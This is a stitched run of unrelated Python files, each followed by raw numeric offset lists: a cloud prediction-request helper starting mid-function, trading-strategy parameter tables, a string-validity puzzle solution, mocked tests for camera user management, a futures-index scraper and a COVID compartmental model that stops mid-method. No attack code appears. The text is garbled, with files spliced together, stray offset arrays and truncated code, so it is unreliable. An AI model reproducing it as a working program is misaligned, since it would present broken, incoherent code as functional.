examples_for_predict = self._json_from_tf_examples(examples)
else:
examples_for_predict = [{'b64': base64.b64encode(
example.SerializeToString()).decode('utf-8') }
for example in examples]
# If there is a user-specified input example adjustment to make, make it.
if adjust_example:
examples_for_predict = [
adjust_example(ex) for ex in examples_for_predict]
# Send request, including custom user-agent for tracking.
request_builder = service.projects().predict(
name=name,
body={'instances': examples_for_predict}
)
user_agent = request_builder.headers.get('user-agent')
request_builder.headers['user-agent'] = (
USER_AGENT_FOR_CAIP_TRACKING + ('-' + user_agent if user_agent else ''))
response = request_builder.execute()
if 'error' in response:
raise RuntimeError(response['error'])
# Get the key to extract the prediction results from.
results_key = self.config.get('predict_output_tensor')
if results_key is None:
if self.config.get('model_type') == 'classification':
results_key = 'probabilities'
else:
results_key = 'outputs'
# Parse the results from the response and return them.
results = []
attributions = (response['attributions']
if 'attributions' in response else None)
for pred in response['predictions']:
# If the prediction contains a key to fetch the prediction, use it.
if isinstance(pred, dict):
pred = pred[results_key]
# If the model is regression and the response is a list, extract the
# score by taking the first element.
if (self.config.get('model_type') == 'regression' and
isinstance(pred, list)):
pred = pred[0]
      # If a prediction adjustment function was provided, use it to adjust
# the prediction.
if adjust_prediction:
pred = adjust_prediction(pred)
results.append(pred)
return {'predictions': results, 'attributions': attributions}
| [
[
[
616,
622
],
[
9629,
9635
],
[
13318,
13324
]
],
[
[
630,
634
]
],
[
[
642,
667
],
[
12887,
12902
]
],
[
[
675,
677
],
[
12827,
12829
]
],
[
[
685,
701
],
[
1411,
1413
],
[
1436,
1438
],
[
4314,
4316
],
[
4410,
4412
]
],
[
[
722,
729
]
],
[
[
758,
769
],
[
4159,
4170
],
[
4434,
4445
]
],
[
[
790,
796
]
],
[
[
813,
823
],
[
9618,
9628
],
[
11221,
11231
],
[
11765,
11775
]
],
[
[
884,
899
],
[
4799,
4814
],
[
5339,
5354
],
[
5685,
5700
],
[
6283,
6298
],
[
7161,
7176
],
[
7838,
7853
],
[
8408,
8423
],
[
8544,
8559
],
[
8881,
8896
],
[
9655,
9670
]
],
[
[
950,
973
],
[
8936,
8959
]
],
[
[
979,
1011
],
[
8835,
8867
]
],
[
[
1089,
1117
],
[
13914,
13942
]
],
[
[
1140,
1153
]
]
] |
dnas = [
['wVW*?', 48, 52, 15.52, 40, 10, -0.23, {'ott_len': 35, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['ftUQf', 46, 66, 10.18, 58, 12, 3.51, {'ott_len': 33, 'ott_percent': 246, 'ott_bw': 117, 'tps_qty_index': 65, 'max_risk': 54}],
['ui*5<', 44, 84, 12.12, 42, 14, 6.81, {'ott_len': 35, 'ott_percent': 232, 'ott_bw': 64, 'tps_qty_index': 21, 'max_risk': 28}],
['-SUNv', 51, 64, 24.47, 58, 12, 3.76, {'ott_len': 26, 'ott_percent': 205, 'ott_bw': 117, 'tps_qty_index': 60, 'max_risk': 64}],
[':YY:_', 54, 59, 21.43, 58, 12, 3.52, {'ott_len': 27, 'ott_percent': 212, 'ott_bw': 122, 'tps_qty_index': 28, 'max_risk': 50}],
['@_W*?', 44, 58, 22.34, 55, 9, 4.25, {'ott_len': 28, 'ott_percent': 220, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
[':VWWv', 55, 61, 23.82, 58, 12, 3.32, {'ott_len': 27, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['7VWWv', 55, 61, 23.82, 58, 12, 3.32, {'ott_len': 27, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['q9da]', 71, 14, 11.37, 75, 4, 3.13, {'ott_len': 34, 'ott_percent': 172, 'ott_bw': 136, 'tps_qty_index': 90, 'max_risk': 49}],
['eVswv', 63, 19, 11.55, 100, 4, 5.34, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 125, 'max_risk': 64}],
['-VUWv', 53, 66, 19.51, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 117, 'tps_qty_index': 74, 'max_risk': 64}],
['@TW*?', 51, 56, 14.24, 45, 11, -1.0, {'ott_len': 28, 'ott_percent': 206, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['@^W*?', 45, 57, 21.06, 55, 9, 4.26, {'ott_len': 28, 'ott_percent': 219, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['_W6,U', 40, 84, 9.31, 50, 14, 6.21, {'ott_len': 32, 'ott_percent': 210, 'ott_bw': 79, 'tps_qty_index': 6, 'max_risk': 43}],
['-VW*9', 57, 49, 23.19, 27, 11, -0.52, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 26}],
['@cW*?', 47, 61, 22.93, 50, 12, 0.29, {'ott_len': 28, 'ott_percent': 225, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['3OWXC', 54, 57, 20.13, 63, 11, 5.57, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 32}],
['3OWXE', 55, 58, 20.61, 63, 11, 5.57, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 33}],
['t]bik', 57, 35, 9.33, 62, 8, 4.47, {'ott_len': 35, 'ott_percent': 217, 'ott_bw': 134, 'tps_qty_index': 103, 'max_risk': 57}],
['-VW<v', 58, 60, 23.78, 58, 12, 3.9, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 32, 'max_risk': 64}],
['-VWMv', 50, 61, 23.08, 58, 12, 3.48, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 59, 'max_risk': 64}],
['-VW.v', 49, 61, 23.86, 58, 12, 4.35, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 64}],
['7Fpob', 66, 12, 12.15, 75, 4, 3.62, {'ott_len': 27, 'ott_percent': 189, 'ott_bw': 151, 'tps_qty_index': 112, 'max_risk': 52}],
['3OW?n', 54, 59, 24.5, 66, 12, 3.73, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 36, 'max_risk': 59}],
['-VWWu', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
[',VWWv', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['-VWWs', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 62}],
['vNqn]', 81, 11, 12.65, 100, 4, 9.27, {'ott_len': 35, 'ott_percent': 199, 'ott_bw': 152, 'tps_qty_index': 111, 'max_risk': 49}],
['-VWWl', 57, 61, 24.09, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 58}],
['-VWWa', 58, 60, 22.96, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 51}],
['-VWW^', 58, 60, 22.96, 58, 12, 3.47, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 49}],
['3OW5n', 50, 59, 24.24, 66, 12, 4.05, {'ott_len': 26, 'ott_percent': 200, 'ott_bw': 120, 'tps_qty_index': 21, 'max_risk': 59}],
['-VWLv', 50, 60, 24.44, 58, 12, 2.84, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 57, 'max_risk': 64}],
['=ptVt', 73, 26, 30.29, 50, 8, 1.89, {'ott_len': 28, 'ott_percent': 241, 'ott_bw': 156, 'tps_qty_index': 73, 'max_risk': 63}],
['g^VGt', 57, 61, 16.78, 63, 11, 5.52, {'ott_len': 33, 'ott_percent': 219, 'ott_bw': 119, 'tps_qty_index': 49, 'max_risk': 63}],
['HPqWv', 64, 17, 16.65, 60, 5, 2.69, {'ott_len': 29, 'ott_percent': 201, 'ott_bw': 152, 'tps_qty_index': 74, 'max_risk': 64}],
['-VW=v', 55, 61, 21.99, 58, 12, 3.27, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 33, 'max_risk': 64}],
['-VW?v', 55, 61, 23.02, 58, 12, 3.04, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 36, 'max_risk': 64}],
['eRQWv', 52, 63, 17.59, 63, 11, 4.81, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 112, 'tps_qty_index': 74, 'max_risk': 64}],
['-dW6n', 51, 64, 27.68, 58, 12, 5.23, {'ott_len': 26, 'ott_percent': 226, 'ott_bw': 120, 'tps_qty_index': 22, 'max_risk': 59}],
['@VX*?', 50, 53, 24.04, 50, 10, 1.23, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 121, 'tps_qty_index': 3, 'max_risk': 30}],
['[\\sta', 66, 18, 12.71, 80, 5, 5.61, {'ott_len': 31, 'ott_percent': 216, 'ott_bw': 155, 'tps_qty_index': 120, 'max_risk': 51}],
['ePRWv', 53, 60, 20.61, 63, 11, 4.2, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 114, 'tps_qty_index': 74, 'max_risk': 64}],
['O=ITi', 49, 69, 21.32, 61, 13, 4.06, {'ott_len': 30, 'ott_percent': 177, 'ott_bw': 102, 'tps_qty_index': 70, 'max_risk': 56}],
['YOR9c', 51, 60, 21.87, 58, 12, 2.39, {'ott_len': 31, 'ott_percent': 200, 'ott_bw': 114, 'tps_qty_index': 27, 'max_risk': 52}],
['-VW;v', 56, 60, 21.81, 58, 12, 3.24, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 30, 'max_risk': 64}],
['eEsWv', 66, 9, 10.3, 75, 4, 5.13, {'ott_len': 33, 'ott_percent': 187, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['?^WWv', 53, 60, 21.94, 63, 11, 6.61, {'ott_len': 28, 'ott_percent': 219, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['=bVNC', 46, 62, 22.8, 50, 12, -0.59, {'ott_len': 28, 'ott_percent': 224, 'ott_bw': 119, 'tps_qty_index': 60, 'max_risk': 32}],
['3eWXn', 53, 64, 29.51, 58, 12, 4.39, {'ott_len': 26, 'ott_percent': 227, 'ott_bw': 120, 'tps_qty_index': 76, 'max_risk': 59}],
['FVW*?', 50, 53, 22.75, 36, 11, -1.52, {'ott_len': 29, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['?dpMr', 61, 26, 28.05, 50, 8, 2.43, {'ott_len': 28, 'ott_percent': 226, 'ott_bw': 151, 'tps_qty_index': 59, 'max_risk': 62}],
['3fWHn', 56, 64, 27.28, 58, 12, 4.26, {'ott_len': 26, 'ott_percent': 229, 'ott_bw': 120, 'tps_qty_index': 51, 'max_risk': 59}],
['QYRcn', 50, 65, 19.63, 58, 12, 3.49, {'ott_len': 30, 'ott_percent': 212, 'ott_bw': 114, 'tps_qty_index': 93, 'max_risk': 59}],
['IVWWv', 51, 58, 22.46, 58, 12, 1.85, {'ott_len': 29, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 74, 'max_risk': 64}],
['?VW.v', 49, 59, 25.96, 58, 12, 2.45, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 64}],
['MVsWv', 66, 18, 17.72, 60, 5, 4.17, {'ott_len': 30, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['@VW*F', 49, 55, 26.22, 45, 11, -0.99, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 34}],
['?VW2v', 52, 59, 27.13, 58, 12, 2.6, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 16, 'max_risk': 64}],
['eVkWv', 72, 22, 20.19, 66, 6, 5.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 145, 'tps_qty_index': 74, 'max_risk': 64}],
['?VuWv', 62, 16, 15.34, 60, 5, 2.75, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 157, 'tps_qty_index': 74, 'max_risk': 64}],
['hPmHf', 73, 19, 19.46, 75, 4, 4.96, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 147, 'tps_qty_index': 51, 'max_risk': 54}],
['hPPHs', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 62}],
['ePPHt', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 63}],
['XRV.a', 50, 54, 25.07, 58, 12, 1.52, {'ott_len': 31, 'ott_percent': 204, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['ePPHa', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 51}],
['ePPH]', 57, 63, 21.8, 63, 11, 5.36, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 51, 'max_risk': 49}],
['CMNWv', 52, 71, 22.36, 58, 12, 4.3, {'ott_len': 28, 'ott_percent': 197, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['BVV.a', 50, 59, 27.82, 58, 12, 2.71, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['<VV.a', 50, 59, 27.82, 58, 12, 2.71, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 119, 'tps_qty_index': 9, 'max_risk': 51}],
['ePjWv', 68, 22, 19.21, 66, 6, 5.68, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 144, 'tps_qty_index': 74, 'max_risk': 64}],
['-VW*=', 55, 54, 29.83, 33, 12, -1.75, {'ott_len': 26, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 28}],
['WrVZ;', 49, 65, 9.97, 50, 10, -1.45, {'ott_len': 31, 'ott_percent': 244, 'ott_bw': 119, 'tps_qty_index': 79, 'max_risk': 27}],
['@VW)?', 48, 54, 23.4, 45, 11, -1.08, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 2, 'max_risk': 30}],
['E^c[A', 58, 34, 10.18, 50, 10, -1.0, {'ott_len': 29, 'ott_percent': 219, 'ott_bw': 135, 'tps_qty_index': 81, 'max_risk': 31}],
['[VsWv', 63, 19, 14.24, 75, 4, 6.76, {'ott_len': 31, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['WVsWv', 63, 19, 14.24, 75, 4, 6.76, {'ott_len': 31, 'ott_percent': 209, 'ott_bw': 155, 'tps_qty_index': 74, 'max_risk': 64}],
['fVPWv', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 64}],
['gVPWv', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 64}],
['o4,@X', 42, 98, 8.28, 45, 20, 5.45, {'ott_len': 34, 'ott_percent': 166, 'ott_bw': 66, 'tps_qty_index': 38, 'max_risk': 45}],
['@VW*A', 49, 55, 25.8, 45, 11, -0.99, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 31}],
['@VW.?', 49, 55, 20.38, 45, 11, -0.98, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 9, 'max_risk': 30}],
['@VWF?', 54, 55, 19.17, 45, 11, -1.64, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 47, 'max_risk': 30}],
['ePPWb', 52, 63, 19.94, 63, 11, 4.8, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 52}],
['ePPW\\', 52, 63, 19.94, 63, 11, 4.8, {'ott_len': 33, 'ott_percent': 201, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 48}],
['eSNWd', 50, 67, 18.68, 53, 13, 2.22, {'ott_len': 33, 'ott_percent': 205, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 53}],
['@XW*?', 50, 54, 25.83, 50, 10, 1.55, {'ott_len': 28, 'ott_percent': 211, 'ott_bw': 120, 'tps_qty_index': 3, 'max_risk': 30}],
['@VW4?', 49, 55, 17.59, 45, 11, -1.73, {'ott_len': 28, 'ott_percent': 209, 'ott_bw': 120, 'tps_qty_index': 19, 'max_risk': 30}],
['eVPWc', 52, 65, 21.16, 53, 13, 1.82, {'ott_len': 33, 'ott_percent': 209, 'ott_bw': 111, 'tps_qty_index': 74, 'max_risk': 52}],
['`RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['cRNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['\\RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
[']RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['aRNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['^RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['_RNWv', 51, 68, 21.49, 53, 13, 1.56, {'ott_len': 32, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 64}],
['eRNDv', 53, 67, 17.86, 53, 13, 3.08, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 44, 'max_risk': 64}],
['eRNWk', 52, 67, 17.52, 53, 13, 2.3, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 57}],
['eRNWZ', 52, 67, 17.52, 53, 13, 2.3, {'ott_len': 33, 'ott_percent': 204, 'ott_bw': 109, 'tps_qty_index': 74, 'max_risk': 47}],
['LewDb', 76, 17, 19.15, 80, 5, 8.45, {'ott_len': 30, 'ott_percent': 227, 'ott_bw': 160, 'tps_qty_index': 44, 'max_risk': 52}],
]
| [
[
[
0,
4
]
]
] |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the isValid function below.
def isValid(s):
ss = list(set(s))
fs = []
for c in ss:
fs.append(s.count(c))
if (len(list(set(fs))))==1:
return 'YES'
elif len(list(set(fs)))==2:
        mx = max(fs)
        mi = min(fs)
        # Valid after one removal only if either (a) exactly one character has
        # the max count and it exceeds the min count by one (drop one of its
        # occurrences), or (b) exactly one character has the min count and that
        # count is 1 (drop that character entirely).
        if fs.count(mx) == 1 and mx - mi == 1:
            return 'YES'
        elif fs.count(mi) == 1 and mi == 1:
            return 'YES'
return 'NO'
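# Worked examples for isValid (added for illustration): 'aabbcc' -> 'YES'
# (all counts already equal), 'aabbccc' -> 'YES' (drop one 'c'),
# 'aabbcccc' -> 'NO' (counts {2, 2, 4}; a single removal cannot equalize them).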
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = isValid(s)
fptr.write(result + '\n')
fptr.close()
| [
[
[
23,
27
]
],
[
[
35,
37
],
[
578,
580
]
],
[
[
45,
51
]
],
[
[
59,
61
]
],
[
[
69,
72
]
],
[
[
117,
124
],
[
641,
648
]
],
[
[
566,
570
],
[
657,
661
],
[
688,
692
]
],
[
[
615,
616
],
[
649,
650
]
],
[
[
632,
638
],
[
668,
674
]
]
] |
"""Test Axis user management.
pytest --cov-report term-missing --cov=axis.pwdgrp_cgi tests/test_pwdgrp_cgi.py
"""
import pytest
from unittest.mock import Mock
from axis.pwdgrp_cgi import SGRP_ADMIN, User, Users
def test_users():
"""Verify that you can list users."""
mock_request = Mock()
users = Users(fixture, mock_request)
assert users['userv']
assert users['userv'].name == 'userv'
assert users['userv'].viewer
assert not users['userv'].operator
assert not users['userv'].admin
assert not users['userv'].ptz
assert users['usero']
assert users['usero'].name == 'usero'
assert users['usero'].viewer
assert users['usero'].operator
assert not users['usero'].admin
assert not users['usero'].ptz
assert users['usera']
assert users['usera'].name == 'usera'
assert users['usera'].viewer
assert users['usera'].operator
assert users['usera'].admin
assert users['usera'].ptz
def test_create():
"""Verify that you can create users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin'
})
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_modify():
"""Verify that you can modify users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.modify('joe', pwd='abcd')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd'
})
users.modify('joe', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'sgrp': 'viewer:operator:admin'
})
users.modify('joe', comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'comment': 'comment'
})
users.modify('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_delete():
"""Verify that you can delete users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.delete('joe')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'remove',
'user': 'joe'
})
fixture = """admin="usera,wwwa,wwwaop,wwwaovp,wwwao,wwwap,wwwaov,root"
anonymous=""
api-discovery=""
audio="streamer,sdk,audiocontrol"
basic-device-info=""
gpio="environment,actionengined,led,mediaclipcgi,iod,scheduled,ptzadm,"
operator="usera,usero,sdk,wwwo,wwwaovp,wwwaop,wwwao,wwwop,wwwaov,root"
ptz="usera,wwwop,wwwaop,wwwaovp,wwwap,wwwp,wwwovp,root,wwwvp,wwwavp"
users="userv,usero,usera"
viewer="usera,usero,sdk,wwwaovp,wwwaov,wwwov,wwwovp,wwwav,root,userv,wwwv"
digusers="root,operator,viewer"
"""
| [
[
[
123,
129
]
],
[
[
156,
160
],
[
295,
299
],
[
1044,
1048
],
[
1845,
1849
],
[
3013,
3017
]
],
[
[
190,
200
],
[
1134,
1144
],
[
1442,
1452
],
[
2144,
2154
],
[
2635,
2645
]
],
[
[
202,
206
]
],
[
[
208,
213
],
[
314,
319
],
[
1063,
1068
],
[
1864,
1869
],
[
3032,
3037
]
],
[
[
220,
230
]
],
[
[
966,
977
]
],
[
[
1767,
1778
]
],
[
[
2935,
2946
]
],
[
[
3245,
3252
],
[
320,
327
],
[
1069,
1076
],
[
1870,
1877
],
[
3038,
3045
]
]
] |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2021/12/20 14:52
Desc: Nanhua Futures - historical trend of commodity indices - price index - values
http://www.nanhua.net/nhzc/varietytrend.html
Starts from 1000 points, accumulated from the returns
http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
"""
import time
import requests
import pandas as pd
def futures_nh_index_symbol_table() -> pd.DataFrame:
"""
    Nanhua Futures - overview table of all varieties covered by the Nanhua index
    http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
    :return: overview table of all varieties covered by the Nanhua index
:rtype: pandas.DataFrame
"""
url = "http://www.nanhua.net/ianalysis/plate-variety.json"
r = requests.get(url)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df['firstday'] = pd.to_datetime(temp_df['firstday']).dt.date
return temp_df
def futures_nh_price_index(symbol: str = "A") -> pd.DataFrame:
"""
    Nanhua Futures - single variety of the Nanhua index - price - full price history
    http://www.nanhua.net/ianalysis/varietyindex/price/A.json?t=1574932974280
    :param symbol: obtained via ak.futures_nh_index_symbol_table()
    :type symbol: str
    :return: Nanhua Futures - single variety of the Nanhua index - price - full price history
    :rtype: pandas.DataFrame
"""
symbol_df = futures_nh_index_symbol_table()
if symbol in symbol_df["code"].tolist():
t = time.time()
url = f"http://www.nanhua.net/ianalysis/varietyindex/price/{symbol}.json?t={int(round(t * 1000))}"
r = requests.get(url)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df.columns = ["date", "value"]
temp_df['date'] = pd.to_datetime(temp_df["date"], unit='ms').dt.date
return temp_df
if __name__ == "__main__":
futures_nh_index_symbol_table_df = futures_nh_index_symbol_table()
print(futures_nh_index_symbol_table_df)
futures_nh_price_index_df = futures_nh_price_index(symbol="NHAI")
print(futures_nh_price_index_df)
| [
[
[
247,
251
],
[
1189,
1193
]
],
[
[
260,
268
],
[
584,
592
],
[
1320,
1328
]
],
[
[
276,
288
],
[
330,
332
],
[
641,
643
],
[
691,
693
],
[
805,
807
],
[
1385,
1387
],
[
1479,
1481
]
],
[
[
295,
324
],
[
1621,
1650
],
[
1100,
1129
]
],
[
[
760,
782
],
[
1730,
1752
]
],
[
[
1586,
1618
],
[
1663,
1695
]
],
[
[
1702,
1727
],
[
1778,
1803
]
]
] |
"""Custom COVID19 Compartmental model
"""
from ..model import CompartmentalModel
class COVID19(CompartmentalModel):
def __init__(self,
N,
beta,
incubation_rate = 1/3.7,
recovery_rate_asymptomatic = 1/4.7,
recovery_rate_mild = 1/4.7,
symptoms_to_hospital_rate = 1/5.5,
symptoms_to_icu_rate = 1/7,
proba_severe = 0.071,
proba_asymptomatic = 0.2,
proba_icu = 0.182,
recovery_rate_hospital = 0.046,
recovery_rate_icu = 0.035,
death_rate_hospital = 0.0046,
death_rate_icu = 0.0087,
isolation_ratio = 0.25,
offset = None,
):
"""COVID19 Compartmental Model
Parameters:
Default params are set according to INSERM research paper
"""
params = {
"N":N,
"beta":beta,
"incubation_rate":incubation_rate,
"recovery_rate_asymptomatic":recovery_rate_asymptomatic,
"recovery_rate_mild":recovery_rate_mild,
"recovery_rate_hospital":recovery_rate_hospital,
"recovery_rate_icu":recovery_rate_icu,
"symptoms_to_icu_rate":symptoms_to_icu_rate,
"symptoms_to_hospital_rate":symptoms_to_hospital_rate,
"death_rate_hospital":death_rate_hospital,
"death_rate_icu":death_rate_icu,
"proba_severe":proba_severe,
"proba_asymptomatic":proba_asymptomatic,
"proba_icu":proba_icu,
"isolation_ratio":isolation_ratio,
}
# Define compartments name and number
compartments = ["S","E","Ia","Im","Is","H","ICU","D","R"]
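        # Flow between compartments (summary comment added for readability):
        #   S -> E -> {Ia, Im, Is};  Is -> {H, ICU};  Ia, Im, H, ICU -> R;  H, ICU -> D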
super().__init__(compartments,offset = offset,params = params)
# Parameters
self.N = N
self.beta = self._make_beta_parameter(beta)
# Prepare transitions
transitions = {
"S":{
"E":lambda y,t : y["S"] / N * self.beta(y,t) * (y["Ia"]+ isolation_ratio * (y["Im"] + y["Is"]))
},
"E":{
"Ia":lambda y,t : incubation_rate * (proba_asymptomatic) * y["E"],
"Im":lambda y,t : incubation_rate * (1 - proba_asymptomatic - proba_severe) * y["E"],
"Is":lambda y,t : incubation_rate * (proba_severe) * y["E"],
},
"Ia":{
"R":lambda y,t : recovery_rate_asymptomatic * y["Ia"],
},
"Im":{
"R":lambda y,t : recovery_rate_hospital* y["Im"],
},
"Is":{
"ICU":lambda y,t : symptoms_to_icu_rate * (proba_icu) * y["Is"],
"H":lambda y,t : symptoms_to_icu_rate * (1-proba_icu) * y["Is"],
},
"ICU":{
"R":lambda y,t : recovery_rate_icu * y["ICU"],
"D":lambda y,t : death_rate_icu * y["ICU"],
},
"H":{
"R":lambda y,t : recovery_rate_hospital * y["H"],
"D":lambda y,t : death_rate_hospital * y["H"],
},
}
# Add transition
self.add_transitions(transitions)
def R0(self, beta):
pa = self.params["proba_asymptomatic"]
ps = self.params["proba_severe"]
proba_icu = self.params["proba_icu"]
recovery_rate_asymptomatic = self.params["recovery_rate_asymptomatic"]
recovery_rate_mild = self.params["recovery_rate_mild"]
recovery_rate_severe = (1-proba_icu) * self.params["symptoms_to_hospital_rate"] + proba_icu * self.params["symptoms_to_icu_rate"]
isolation_ratio = self.params["isolation_ratio"]
